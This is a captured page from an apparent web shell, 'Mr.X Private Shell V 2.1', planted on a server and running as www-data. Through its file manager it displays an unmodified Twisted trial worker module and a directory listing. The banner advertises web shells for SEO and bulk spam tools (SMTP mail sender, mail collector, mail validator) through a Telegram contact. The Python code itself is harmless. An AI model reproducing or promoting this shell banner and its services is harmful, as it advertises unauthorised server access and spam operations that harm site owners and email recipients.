__  __    __   __  _____      _            _          _____ _          _ _ 
 |  \/  |   \ \ / / |  __ \    (_)          | |        / ____| |        | | |
 | \  / |_ __\ V /  | |__) | __ ___   ____ _| |_ ___  | (___ | |__   ___| | |
 | |\/| | '__|> <   |  ___/ '__| \ \ / / _` | __/ _ \  \___ \| '_ \ / _ \ | |
 | |  | | |_ / . \  | |   | |  | |\ V / (_| | ||  __/  ____) | | | |  __/ | |
 |_|  |_|_(_)_/ \_\ |_|   |_|  |_| \_/ \__,_|\__\___| |_____/|_| |_|\___V 2.1
 if you need WebShell for Seo everyday contact me on Telegram
 Telegram Address : @jackleet
        
        
For_More_Tools: Telegram: @jackleet | Bulk Smtp support mail sender | Business Mail Collector | Mail Bouncer All Mail | Bulk Office Mail Validator | Html Letter private



Upload:

Command:

www-data@216.73.216.10: ~ $
# -*- test-case-name: twisted.trial._dist.test.test_workertrial -*-
#
# Copyright (c) Twisted Matrix Laboratories.
# See LICENSE for details.

"""
Implementation of C{AMP} worker commands, and main executable entry point for
the workers.

@since: 12.3
"""

import errno
import os
import sys

from twisted.internet.protocol import FileWrapper
from twisted.python.log import startLoggingWithObserver, textFromEventDict
from twisted.trial._dist import _WORKER_AMP_STDIN, _WORKER_AMP_STDOUT
from twisted.trial._dist.options import WorkerOptions


class WorkerLogObserver:
    """
    A log observer that forward its output to a C{AMP} protocol.
    """

    def __init__(self, protocol):
        """
        @param protocol: a connected C{AMP} protocol instance.
        @type protocol: C{AMP}
        """
        self.protocol = protocol

    def emit(self, eventDict):
        """
        Produce a log output.
        """
        from twisted.trial._dist import managercommands

        text = textFromEventDict(eventDict)
        if text is None:
            return
        self.protocol.callRemote(managercommands.TestWrite, out=text)


def main(_fdopen=os.fdopen):
    """
    Main function to be run if __name__ == "__main__".

    @param _fdopen: If specified, the function to use in place of C{os.fdopen}.
    @type _fdopen: C{callable}
    """
    config = WorkerOptions()
    config.parseOptions()

    from twisted.trial._dist.worker import WorkerProtocol

    workerProtocol = WorkerProtocol(config["force-gc"])

    protocolIn = _fdopen(_WORKER_AMP_STDIN, "rb")
    protocolOut = _fdopen(_WORKER_AMP_STDOUT, "wb")
    workerProtocol.makeConnection(FileWrapper(protocolOut))

    observer = WorkerLogObserver(workerProtocol)
    startLoggingWithObserver(observer.emit, False)

    while True:
        try:
            r = protocolIn.read(1)
        except OSError as e:
            if e.args[0] == errno.EINTR:
                continue
            else:
                raise
        if r == b"":
            break
        else:
            workerProtocol.dataReceived(r)
            protocolOut.flush()
            sys.stdout.flush()
            sys.stderr.flush()

    if config.tracer:
        sys.settrace(None)
        results = config.tracer.results()
        results.write_results(
            show_missing=True, summary=False, coverdir=config.coverdir().path
        )


if __name__ == "__main__":
    main()

Filemanager

Name Type Size Permission Actions
__pycache__ Folder 0755
test Folder 0755
__init__.py File 1.9 KB 0644
distreporter.py File 2.58 KB 0644
disttrial.py File 16.22 KB 0644
functional.py File 2.88 KB 0644
managercommands.py File 1.73 KB 0644
options.py File 737 B 0644
stream.py File 2.38 KB 0644
worker.py File 14.1 KB 0644
workercommands.py File 574 B 0644
workerreporter.py File 11.32 KB 0644
workertrial.py File 2.37 KB 0644
Filemanager